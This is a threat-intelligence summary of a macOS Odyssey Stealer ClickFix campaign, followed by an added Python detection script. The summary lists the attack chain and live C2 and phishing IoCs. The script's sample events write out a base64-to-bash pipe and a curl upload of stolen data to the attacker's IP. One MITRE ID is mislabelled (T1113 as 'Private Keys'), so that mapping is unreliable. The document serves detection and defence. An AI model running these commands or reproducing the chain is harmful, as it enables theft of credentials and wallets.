Odyssey MacOS Stealer

Researchers observed a ClickFix phishing campaign targeting macOS that delivers an AppleScript-based stealer (Odyssey Stealer) via a fake CAPTCHA and terminal “base64 -d | bash” command, harvesting browsers, crypto wallets, Keychain items, and files before exfiltrating to a remote server. IOCs and protections show the infrastructure centered on 45.146.130[.]131 and the phishing domain tradingviewen[.]com. #OdysseyStealer #tradingviewen #45.146.130.131

Keypoints

  • The attack uses a ClickFix social-engineering technique: a fake CAPTCHA page detects the visitor's OS and supplies OS-specific commands for the user to paste.
  • On macOS, the pasted command is base64-decoded and run by bash; it retrieves a URL-hosted AppleScript (.scpt), which prompts for the user's password and is executed with osascript.
  • The AppleScript enumerates and collects files from Desktop/Documents, Safari cookies, Apple Notes, Keychain files, and various browser data.
  • Chromium and Firefox profiles are scanned for crypto wallet-related extensions and local storage/indexedDB items for wallet data (e.g., Electrum, Exodus, Wasabi).
  • Collected data is packaged to /tmp/out.zip and exfiltrated to hxxp://45.146.130[.]131/log, then cleanup removes the temporary artifacts.
  • The campaign avoids dropping binaries, relying on obfuscated AppleScript and terminal commands to bypass traditional detection.
  • Defensive actions include blocking malicious URLs, adding .scpt signatures to threat databases, and categorizing C2 servers to prevent callbacks.

MITRE Techniques

  • [T1204] User Execution – Attackers trick users into executing pasted commands in the terminal via a fake CAPTCHA and OS-tailored instructions (“…the CAPTCHA verification…asks the user to perform several actions” / “…pasting command on terminal, it pastes a malicious command which executes using bash”).
  • [T1059] Command and Scripting Interpreter – The campaign uses bash and osascript to decode base64 commands and execute an AppleScript payload (“echo … | base64 -d | bash” and use of “osascript” to execute the AppleScript automatically).
  • [T1218] System Binary Proxy Execution – The AppleScript leverages legitimate system utilities (curl, mkdir, zip) to assemble and exfiltrate data (“mkdir …”, “curl” to upload /tmp/out.zip to hxxp://45.146.130[.]131/log).
  • [T1005] Data from Local System – The AppleScript collects files from Desktop and Documents and Keychain and notes (“file gathering from user’s Desktop and Documents folder”, “script also gathers Safari cookies, Apple notes and Keychain files”).
  • [T1074] Data Staged – Collected artifacts are packaged into a ZIP archive in /tmp/out.zip prior to exfiltration (“scripts sets up the exfiltration mechanism and packages everything into a ZIP archive…saved to /tmp/out.zip”).
  • [T1041] Exfiltration Over HTTP/HTTPS – The ZIP archive is uploaded to a remote HTTP endpoint for data theft (“uploads archive to hxxp://45.146.130[.]131/log using a curl command”).
  • [T1113] Private Keys – The stealer targets browser/extension-stored crypto wallet items and keys by scanning local storage and indexedDB for wallet-related data (“scans their local storage and indexedDB directories … wallet related information stored is also exfiltrated”).

Indicators of Compromise

  • [Domain] initial phishing domain – tradingviewen[.]com
  • [IP/C2] command-and-control and hosting – 45.146.130[.]131
  • [URL] malicious payload and endpoints – hxxps://45.146.130[.]131/d/vipx14350, hxxps://45.146.130[.]131/log
  • [File] AppleScript artifact – 43917e7dab6e09087de24f7878b9c1c1a7ec1968 (.scpt) and /tmp/out.zip (exfiltrated archive)
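The following is an added detection example, not code from the Forcepoint write-up or from the campaign itself. It turns the behaviours listed in the Key points and MITRE sections (a base64-decode pipe into a shell, a curl download of a .scpt, a curl upload of a /tmp ZIP) into heuristic regex rules, refangs the defanged indicators above into searchable form, and runs both over a handful of constructed process-event lines of the kind an EDR or unified-log export would produce. The event format, the `/tmp/update.scpt` and `/tmp/payload.scpt` paths, the `PAYLOAD_B64` placeholder and the sample URLs other than the page's IoCs are all invented for illustration. URL indicators are matched without their scheme because the page reports the /log endpoint both as hxxp and hxxps.

```python
"""Heuristic ClickFix / Odyssey Stealer triage over process-event lines.

Added example. The IoC values come from the published write-up; every
event line below is constructed for demonstration.
"""
import re

# Defanged indicators exactly as published on the page.
DEFANGED_IOCS = {
    "domain": ["tradingviewen[.]com"],
    "ip": ["45.146.130[.]131"],
    "url": ["hxxps://45.146.130[.]131/d/vipx14350",
            "hxxps://45.146.130[.]131/log"],
    "sha1": ["43917e7dab6e09087de24f7878b9c1c1a7ec1968"],
    "path": ["/tmp/out.zip"],
}

# Behavioural rules derived from the reported attack chain. These are
# heuristics for triage, not a complete signature set: a legitimate admin
# pipeline can trip the first rule, so treat hits as leads to review.
BEHAVIOR_RULES = [
    # "echo ... | base64 -d | bash": decoded blob handed straight to a shell
    ("clickfix_base64_pipe_shell",
     re.compile(r"base64\s+(?:-d|-D|--decode)\b.*\|\s*(?:ba|z)?sh\b")),
    # curl/wget fetching an AppleScript file from a remote host
    ("curl_fetch_scpt",
     re.compile(r"\b(?:curl|wget)\b.*\.scpt\b")),
    # curl uploading a ZIP staged under /tmp (generalises the /tmp/out.zip case)
    ("curl_upload_tmp_archive",
     re.compile(r"\bcurl\b.*(?:-F|--form|-d|--data(?:-binary)?|-T|--upload-file)\b"
                r".*/tmp/[^\s]*\.zip\b")),
]


def refang(value: str) -> str:
    """Reverse the usual defanging: [.] -> . and hxxp -> http."""
    return value.replace("[.]", ".").replace("hxxp", "http")


def build_matchers(defanged: dict) -> dict:
    """Refang and lower-case every IoC; strip the scheme from URLs so that
    hxxp and hxxps variants of the same endpoint both match."""
    matchers = {}
    for kind, values in defanged.items():
        refanged = [refang(v).lower() for v in values]
        if kind == "url":
            refanged = [u.split("://", 1)[-1] for u in refanged]
        matchers[kind] = refanged
    return matchers


IOC_MATCHERS = build_matchers(DEFANGED_IOCS)


def scan_line(line: str) -> list:
    """Return the names of behaviour rules and IoC kinds that fire on one line."""
    findings = [name for name, pattern in BEHAVIOR_RULES if pattern.search(line)]
    lowered = line.lower()
    for kind, values in IOC_MATCHERS.items():
        if any(v in lowered for v in values):
            findings.append(f"ioc:{kind}")
    return findings


def scan_events(events: list) -> dict:
    """Map event index -> findings for every event with at least one hit."""
    hits = {}
    for idx, event in enumerate(events):
        findings = scan_line(event)
        if findings:
            hits[idx] = findings
    return hits


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    "uid=501 proc=bash cmd=echo PAYLOAD_B64 | base64 -d | bash",
    "uid=501 proc=curl cmd=curl -s https://45.146.130.131/d/vipx14350 -o /tmp/update.scpt",
    "uid=501 proc=curl cmd=curl -F file=@/tmp/out.zip http://45.146.130.131/log",
    "uid=501 proc=zsh cmd=ls -la ~/Documents",
    "uid=501 proc=curl cmd=curl -s https://example.com/index.html",
    "uid=501 proc=osascript cmd=osascript /tmp/payload.scpt sha1=43917e7dab6e09087de24f7878b9c1c1a7ec1968",
    "uid=501 proc=Safari url=https://tradingviewen.com/verify",
]

if __name__ == "__main__":
    for idx, findings in scan_events(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(findings)}")
```

Events 3 and 4 produce no findings; the others each surface at least one behaviour rule or indicator, and a real deployment would feed the same functions from an EDR export rather than the inline list.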


Read more: https://www.forcepoint.com/blog/x-labs/odyssey-stealer-attacks-macos-users